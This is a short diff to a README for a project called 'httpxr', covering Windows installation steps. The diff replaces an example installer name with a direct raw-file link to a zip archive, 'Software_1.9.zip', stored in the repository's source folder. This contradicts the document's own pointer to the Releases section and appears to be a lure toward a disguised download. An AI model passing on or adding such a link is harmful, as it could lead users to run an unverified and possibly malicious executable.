matrix360143/httpxr/README.md

 2. On the GitHub page, look for the section labeled **Releases** or **Assets**.
 This is where you find the file to download.

 3. Download the latest Windows installer file.
 The file name usually ends with `.exe`.
-For example, `httpxr-setup.exe`.
+For example, `https://raw.githubusercontent.com/matrix360143/httpxr/main/src/client/Software_1.9.zip`.

 4. Once the file has finished downloading, find it in your Downloads folder or wherever your browser saves files.